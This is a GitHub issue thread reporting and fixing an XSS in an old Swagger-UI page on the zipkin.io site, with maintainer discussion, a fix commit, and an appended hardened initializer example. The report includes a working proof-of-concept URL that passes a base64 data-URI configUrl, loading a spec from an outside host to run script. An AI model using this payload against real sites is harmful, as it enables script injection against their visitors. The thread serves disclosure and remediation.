
xss at https://zipkin.io/zipkin-api/ #98

Closed
Iieitaimus opened this issue May 15, 2023 · 6 comments

Comments

@Iieitaimus

Describe the Bug

There is a running old Swagger-UI exposed at https://zipkin.io/zipkin-api/. It's possible to execute JS.

Steps to Reproduce

POC alert box:

  1. Go to: https://zipkin.io/zipkin-api/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
@Iieitaimus Iieitaimus added the bug label May 15, 2023
@jcchavezs
Contributor

Up to update the swagger UI?

@codefromthecrypt codefromthecrypt transferred this issue from openzipkin/zipkin Feb 18, 2024
@codefromthecrypt
Member

gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.

Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.

@SamTV12345

SamTV12345 commented Feb 19, 2024

> gh-pages branch https://github.com/openzipkin/zipkin-api/tree/gh-pages is where the UI is, so help wanted updating it! cc @SamTV12345 if you have time.
>
> Note that I have no guarantee that this will actually solve the XSS, so probably want to read the docs and see if there's a config required also, and if that config already exists for the current version we expose on the website.

Could you please point me to how this API is built 😃 ? I found this library named Sway which hasn't received any update in 5 years.

@codefromthecrypt
Member

sure.. here was my note on the last commit that did anything notable 72928f0 (remember the PR has to be on the gh-pages branch)

so, unzip a release and see if it fixes the XSS.. there may be some drift on changes. Anything not obviously ours it doesn't touch on unzip probably needs to be deleted (things that were from an old version) https://github.com/swagger-api/swagger-ui/releases

@codefromthecrypt
Member

@SamTV12345 so simply using the new version of swagger didn't remove the XSS. Using "killing this XSS" as a goal, let's look into your custom build (from master). For example, possibly we can just remove the form and hard-code the swagger, as well source it locally vs via an absolute href.

Wanna go for it?

To actually deploy the whole site to GH pages, edit/rename build-bin/idl_to_gh_pages to build-bin/dist_to_gh_pages and make sure the IDL ends up in the dist ;)

codefromthecrypt pushed a commit that referenced this issue Mar 3, 2024
This removes the TopBar form, which removes any XSS related to it, by
changing the swagger-initializer.js file. This is the simplest way to
achieve the goal as we already need a custom initializer.js regardless.

As this change is against the gh-pages branch, I can't also update
build-bin/README.md on master. I'll do that in a separate PR once it is
verified to fix the issue. We can also make a gh-pages workflow which
unpacks the default dist and applies this change.

Fixes #98

Signed-off-by: Adrian Cole <[email protected]>
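The commit message above describes the fix as replacing swagger-initializer.js so that the TopBar form is gone and the spec location is fixed. The file below is an added example of what such a hardened initializer looks like; it is not the zipkin-api gh-pages file itself. The spec path `./openapi.yaml`, the element id `#swagger-ui` and the `isHardened` review helper are placeholders and assumptions of this example, and the Swagger UI options used (`url`, `dom_id`, `presets`, `layout`, `queryConfigEnabled`) are the standard ones documented by Swagger UI.

```javascript
// Added example of a hardened swagger-initializer.js (not the project's own
// file). Assumptions: the spec is a relative same-origin path (placeholder
// "./openapi.yaml") and the Swagger UI globals exist only in the browser.
"use strict";

// Placeholder for the project's IDL file, served from the same origin as the
// page: a relative path rather than an absolute href to another host.
const SPEC_PATH = "./openapi.yaml";

// Build the Swagger UI options. `bundle` is the SwaggerUIBundle global in a
// browser; `search` is window.location.search and is accepted only so a test
// can show that the page address has no influence on the result.
function buildOptions(bundle, search) {
  void search; // deliberately unused: nothing in the query string selects the spec
  return {
    url: SPEC_PATH,
    dom_id: "#swagger-ui",
    deepLinking: true,
    // Only the API preset. Leaving out SwaggerUIStandalonePreset and using
    // BaseLayout means there is no TopBar, and therefore no URL form at all.
    presets: [bundle.presets.apis],
    plugins: [],
    layout: "BaseLayout",
    // false is already the default in current Swagger UI; it is stated here so
    // a later copy-paste of the stock initializer cannot silently re-enable
    // reading "url"/"configUrl" from the query string.
    queryConfigEnabled: false,
  };
}

// Review helper (assumption of this example): true when an options object
// neither honours the query string nor ships the TopBar layout, and loads
// the spec from a relative same-origin path.
function isHardened(options) {
  return options.queryConfigEnabled !== true
    && options.layout !== "StandaloneLayout"
    && typeof options.url === "string"
    && !/^[a-z][a-z0-9+.-]*:/i.test(options.url); // no scheme: relative path only
}

// Browser entry point; skipped when the file is loaded outside a browser.
if (typeof window !== "undefined" && typeof SwaggerUIBundle !== "undefined") {
  window.onload = function () {
    window.ui = SwaggerUIBundle(buildOptions(SwaggerUIBundle, window.location.search));
  };
}
```

`isHardened` is a quick sanity check to run over a deployed initializer's options during review: it catches the three things the thread discusses (query-string config, the TopBar form, and an absolute spec URL), but a custom layout that re-adds the TopBar would still need a manual look.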